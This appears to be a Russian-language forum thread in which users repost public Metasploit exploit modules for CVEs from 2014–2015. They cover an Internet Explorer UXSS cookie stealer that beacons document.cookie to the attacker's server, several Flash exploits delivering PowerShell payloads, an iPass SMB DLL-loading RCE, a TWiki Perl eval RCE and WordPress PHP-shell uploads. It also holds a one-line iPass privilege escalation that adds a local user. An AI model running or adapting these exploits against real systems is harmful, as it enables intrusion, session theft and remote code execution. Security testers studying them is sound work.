    print_status "Sending payload EXE..."
    send_response(cli, generate_payload_exe,
                  'Content-Type' => 'application/x-msdos-program'
                 )
  end
 
end

DarckSol · 15.02.2015

Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection Exploit

Description:
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot have X-Frame-Options or it will fail). You can also have your own custom JavaScript by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if you are behind NAT.
Usage info:
msf > use auxiliary/gather/ie_uxss_injection
msf auxiliary(ie_uxss_injection) > show actions ...actions...
msf auxiliary(ie_uxss_injection) > set ACTION <action-name>
msf auxiliary(ie_uxss_injection) > show options ...show and set options...
msf auxiliary(ie_uxss_injection) > run

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
'Description' => %q{
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
you are behind NAT.
},
'License' => MSF_LICENSE,
'Author' =>
[
'David Leo', # Original discovery
'filedescriptor', # PoC
'joev', # He figured it out really
'sinn3r' # MSF
],
'References' =>
[
[ 'CVE', '2015-0072' ],
[ 'OSVDB', '117876' ],
[ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
],
'Platform' => 'win',
'DisclosureDate' => "Feb 1 2015"
))
register_options(
[
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
], self.class)
end
def setup
if target_uri !~ /^http/i
raise Msf::OptionValidateError.new(['TARGET_URI'])
end
super
end
def target_uri
datastore['TARGET_URI']
end
def get_html
@html ||= html
end
def ninja_cookie_stealer_name
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
end
def get_uri(cli=self.cli)
ssl = datastore["SSL"]
proto = (ssl ? "https://" : "http://")
if datastore['URIHOST']
host = datastore['URIHOST']
elsif (cli and cli.peerhost)
host = Rex::Socket.source_address(cli.peerhost)
else
host = srvhost_addr
end
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
if datastore['URIPORT'] != 0
port = ':' + datastore['URIPORT'].to_s
elsif (ssl and datastore["SRVPORT"] == 443)
port = ''
elsif (!ssl and datastore["SRVPORT"] == 80)
port = ''
else
port = ":" + datastore["SRVPORT"].to_s
end
uri = proto + host + port + get_resource
uri
end
def server_uri
@server_uri ||= get_uri
end
def js
datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
end
def html
%Q|
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
<script>
window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
</script>
|
end
def run
exploit
end
def extract_cookie(uri)
Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
end
def on_request_uri(cli, request)
case request.uri
when /redirect\.php/
print_status("Sending redirect")
send_redirect(cli, "#{datastore['TARGET_URI']}")
when /sleep\.php/
sleep(3)
send_response(cli, '')
when /#{ninja_cookie_stealer_name}/
data = extract_cookie(request.uri)
if data.blank?
print_status("The XSS worked, but no cookie")
else
print_status("Got cookie")
print_line(data)
report_note(
:host => cli.peerhost,
:type => 'ie.cookie',
:data => data
)
path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
vprint_good("Cookie stored as: #{path}")
end
else
print_status("Sending HTML")
send_response(cli, get_html)
end
end

DarckSol · 12.03.2015

Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free Exploit

Description:
This Metasploit module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This Metasploit module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
      'Description'         => %q{
        This module exploits an use after free vulnerability in Adobe Flash Player. The
        vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
        to uncompress() a malformed byte stream. This module has been tested successfully
        on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and
        16.0.0.235.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'hdarwin', # Public exploit by @hdarwin89
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0311'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
          ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
          ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Apr 28 2014',
      'DefaultTarget'       => 0))
  end
 
  def exploit
    @swf = create_swf
    super
  end
 
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")
 
    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end
 
    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end
 
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)
 
    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |
 
    return html_template, binding()
  end
 
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
    swf
  end
 
end

Или используем обновление системы, кто юзает версию от GitHub
Код:
sudo msfupdate
Остальные же ручками качают фарш и кладут все хозяйство в нужные папочки.., при запуске сплоита, он скажет, чего ему не хватает...

DarckSol · 14.03.2015

iPass Control Pipe Remote Command Execution Exploit

This Metasploit module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused to force the service to load a DLL from a SMB share.

.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IPass Control Pipe Remote Command Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the IPass Client service. This service provides a
        named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
        to force the service to load a DLL from a SMB share.
      },
      'Author'         =>
        [
          'Matthias Kaiser', # Vulnerability discovery
          'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-0925' ],
          [ 'OSVDB', '117423' ],
          [ 'BID', '72265' ],
          [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'         =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'        => 'win',
      'Targets'         =>
        [
          [ 'Windows x32', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'Privileged'      => true,
      'DisclosureDate'  => 'Jan 21 2015',
      'DefaultTarget'   => 0))
 
    register_options(
      [
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
      ], self.class)
 
    deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
  end
 
  def check
    echo_value = rand_text_alphanumeric(rand(10) + 10)
 
    begin
      response = send_command("System.Echo #{echo_value}")
      if response =~ Regexp.new(echo_value)
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Unknown
      end
    rescue Rex::ConnectionError => e
      vprint_error("Connection failed: #{e.class}: #{e}")
      return Msf::Exploit::CheckCode::Unknown
    rescue Rex::Proto::SMB::Exceptions::LoginError => e
      vprint_error('Connection reset during login')
      return Msf::Exploit::CheckCode::Unknown
    end
  end
 
  def setup
    super
    self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
    self.share = Rex::Text.rand_text_alpha(5)
  end
 
  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")
    send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
  end
 
  def send_command(command)
    # The connection is closed after each command, so we have to reopen it
    connect
    smb_login
    pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
    pipe.write(Rex::Text.to_unicode(command))
    response = Rex::Text.to_ascii(pipe.read)
 
    response
  end
 
 
  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) { super }
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
 
end

-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Не из метасплоита, но по теме...
-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
iPass Mobile Client 2.4.2.15122 Privilege Escalation Vulnerability

EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c
net user mogwai mogwai /ADD;;

-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

DarckSol · 20.03.2015

TWiki Debugenableplugins Remote Code Execution Exploit

TWiki versions 4.0.x through 6.0.0 contain a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in an Perl eval statement which allows remote code execution.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'TWiki Debugenableplugins Remote Code Execution',
      'Description' => %q{
        TWiki 4.0.x-6.0.0  contains a vulnerability in the Debug functionality.
        The value of the debugenableplugins parameter is used without proper sanitization
        in an Perl eval statement which allows remote code execution
      },
      'Author' =>
        [
          'Netanel Rubin', # from Check Point - Discovery
          'h0ng10', # Metasploit Module
  
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2014-7236'],
          [ 'OSVDB', '112977'],
          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
        ],
      'Privileged' => false,
      'Targets' =>
        [
          [ 'Automatic',
            {
              'Payload'        =>
                {
                  'BadChars' => "",
                  'Compat'      =>
                    {
                      'PayloadType' => 'cmd',
                      'RequiredCmd' => 'generic perl python php',
                    }
                },
              'Platform' => ['unix'],
              'Arch' => ARCH_CMD
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 09 2014'))
  
    register_options(
      [
        OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
        OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
      ], self.class)
  end
  
  
  def send_code(perl_code)
    uri = target_uri.path
    data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"
  
    res = send_request_cgi!({
      'method' => 'POST',
      'uri' => uri,
      'data' => data
    })
  
    return res
  end
  
  
  def check
    rand_1 = rand_text_alpha(5)
    rand_2 = rand_text_alpha(5)
  
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
    res = send_code(code)
  
    if res and res.code == 200
      return CheckCode::Vulnerable if res.body == rand_1 + rand_2
    end
    CheckCode::Unknown
  end
  
  
  def exploit
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
    code += "require('MIME/Base64.pm');MIME::Base64->import();"
    code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
    res = send_code(code)
    handler
  
  end
  
end

krest · 21.04.2015

Adobe Flash Player copyPixelsToByteArray Integer Overflow

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer

def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow',
'Description' => %q{
This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs
in the copyPixelsToByteArray method from the BitmapData object. The position field of the
destination ByteArray can be used to cause an integer overflow and write contents out of
the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit),
IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery and 64 bit analysis / exploit
'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket
'hdarwin', # @hdarwin89, 32 bit public exploit, this msf module uses it
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2014-0556'],
['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'],
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'],
['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'],
['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') },
:arch => ARCH_X86
},
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 23 2014',
'DefaultTarget' => 0))
end

def exploit
@swf = create_swf
super
end

def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")

if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end

print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end

def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)

html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }

swf
end

end

krest · 21.04.2015

WordPress SlideShow Gallery Authenticated File Upload

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(
info,
'Name' => 'Wordpress SlideShow Gallery Authenticated File Upload',
'Description' => %q{
The Wordpress SlideShow Gallery plugin contains an authenticated file upload
vulnerability. We can upload arbitrary files to the upload folder, because
the plugin also uses it's own file upload mechanism instead of the wordpress
api it's possible to upload any file type.
},
'Author' =>
[
'Jesus Ramirez Pichardo', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-5460'],
['EDB', '34681'],
['WPVDB', '7532']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['WP SlideShow Gallery 1.4.6', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 28 2014'))

register_options(
[
OptString.new('WP_USER', [true, 'A valid username', nil]),
OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
], self.class)
end

def user
datastore['WP_USER']
end

def password
datastore['WP_PASSWORD']
end

def check
check_plugin_version_from_readme('slideshow-gallery', '1.4.7')
end

def exploit
print_status("#{peer} - Trying to login as #{user}")
cookie = wordpress_login(user, password)
if cookie.nil?
print_error("#{peer} - Unable to login as #{user}")
return
end

print_status("#{peer} - Trying to upload payload")
filename = "#{rand_text_alpha_lower(8)}.php"

data = Rex::MIME::Message.new
data.add_part("", nil, nil, 'form-data; name="Slide[id]"')
data.add_part("", nil, nil, 'form-data; name="Slide[link]"')
data.add_part("", nil, nil, 'form-data; name="Slide[image_url]"')
data.add_part('both', nil, nil, 'form-data; name="Slide[showinfo]"')
data.add_part('randonx', nil, nil, 'form-data; name="Slide[description]"')
data.add_part('file', nil, nil, 'form-data; name="Slide[type]"')
data.add_part('randonx', nil, nil, 'form-data; name="Slide[title]"')
data.add_part('70', nil, nil, 'form-data; name="Slide[iopacity]"')
data.add_part('N', nil, nil, 'form-data; name="Slide[uselink]"')
data.add_part("", nil, nil, 'form-data; name="Slide[order]"')
data.add_part('self', nil, nil, 'form-data; name="Slide[linktarget]"')
data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"")
post_data = data.to_s

print_status("#{peer} - Uploading payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'vars_get' => {
'page' => 'slideshow-slides',
'method' => 'save'
},
'data' => post_data,
'cookie' => cookie
})

if res
if res.code == 200
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
end
else
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end

print_status("#{peer} - Calling uploaded file #{filename}")
send_request_cgi(
'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename)
)
end
end

krest · 28.04.2015

WordPress WPshop eCommerce 1.3.9.5 Shell Upload

Код:

##
# This module requires Metasploit: _http://metasploit.com/download
# Current source: _https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
code execution. This module has been tested successfully on WordPress WPshop eCommerce
1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
},
'Author' =>
[
'g0blin', # Vulnerability Discovery, initial msf module
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '7830'],
['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],
'DisclosureDate' => 'Mar 09 2015',
'DefaultTarget' => 0)
)
end

def check
check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
end

def exploit
php_page_name = rand_text_alpha(5 + rand(5)) + '.php'

data = Rex::MIME::Message.new
data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
post_data = data.to_s

res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)

if res
if res.code == 200 && res.body =~ /#{php_page_name}/
print_good("#{peer} - Payload uploaded as #{php_page_name}")
register_files_for_cleanup(php_page_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, "#{peer} - Server did not answer")
end

print_status("#{peer} - Calling payload...")
send_request_cgi(
{ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
5
)
end
end

DarckSol · 08.05.2015

Adobe Flash Player domainMemory ByteArray Use After Free

escription:
This module exploits a use-after-free vulnerability in Adobe Flash
Player. The vulnerability occurs when the ByteArray assigned to the
current ApplicationDomain is freed from an ActionScript worker, when
forcing a reallocation by copying more contents than the original
capacity, but Flash forgets to update the domainMemory pointer,
leading to a use-after-free situation when the main worker
references the domainMemory again. This module has been tested
successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash
17.0.0.134.

References:
http://cvedetails.com/cve/2015-0359/
https://helpx.adobe.com/security/products/f.../apsb15-06.html
https://www.fireeye.com/blog/threat-researc...exploiting.html
http://malware.dontneedcoffee.com/2015/04/...700134-and.html
https://git.hacklab.kr/snippets/13
http://pastebin.com/Wj3NViUu

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player domainMemory ByteArray Use After Free',
      'Description'         => %q{
        This module exploits a use-after-free vulnerability in Adobe Flash Player. The
        vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
        is freed from an ActionScript worker, when forcing a reallocation by copying more
        contents than the original capacity, but Flash forgets to update the domainMemory
        pointer, leading to a use-after-free situation when the main worker references the
        domainMemory again. This module has been tested successfully on Windows 7 SP1
        (32-bit), IE 8 and IE11 with Flash 17.0.0.134.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'bilou', # Vulnerability discovery according to Flash Advisory
          'Unknown', # Exploit in the wild
          'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0359'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],
          ['URL', 'https://git.hacklab.kr/snippets/13'],
          ['URL', 'http://pastebin.com/Wj3NViUu']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Apr 14 2014',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end

Добавлено в [time]1431068545[/time]
Рекомендую всем, кто использует данный продукт, перейти на контроль версии от Гида, как результат:

123@123-VirtualBox:~$ sudo msfupdate
sudo: unable to resolve host 123-VirtualBox
[sudo] password for 123:
Sorry, try again.
[sudo] password for 123:
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[*] Checking for updates via git
[*] Note: Updating from bleeding edge
HEAD is now at 67a23f2 Land #5296, info hash product name fix
Already on 'master'
Your branch is ahead of 'origin/master' by 3113 commits.
(use "git push" to publish your local commits)
remote: Counting objects: 3133, done.
remote: Compressing objects: 100% (342/342), done.
remote: Total 3133 (delta 658), reused 455 (delta 454), pack-reused 2337
Receiving objects: 100% (3133/3133), 6.36 MiB | 2.37 MiB/s, done.
Resolving deltas: 100% (2325/2325), done.
From git://github.com/rapid7/metasploit-framework
+ cb642f9...02bc8eb gh-pages   -> upstream/gh-pages (forced update)
   67a23f2..5085749 master    -> upstream/master
   4c9f44b..013781f release -> upstream/release
   0b608e1..e95c908 staging/rails-4.0 -> upstream/staging/rails-4.0
* [new tag]    2015050601 -> 2015050601
* [new tag]    blog-20150506 -> blog-20150506
Updating 67a23f2..5085749
Fast-forward
.gitignore |   4 +-
Gemfile.lock |   4 +-
data/exploits/CVE-2015-0336/msf.swf    | Bin 0 -> 18060 bytes
data/exploits/CVE-2015-0336/trigger.swf    | Bin 0 -> 340 bytes
data/exploits/CVE-2015-0359/msf.swf    | Bin 0 -> 18109 bytes
data/java/com/metasploit/meterpreter/MemoryBufferURLConnection.class | Bin 3130 -> 0 bytes
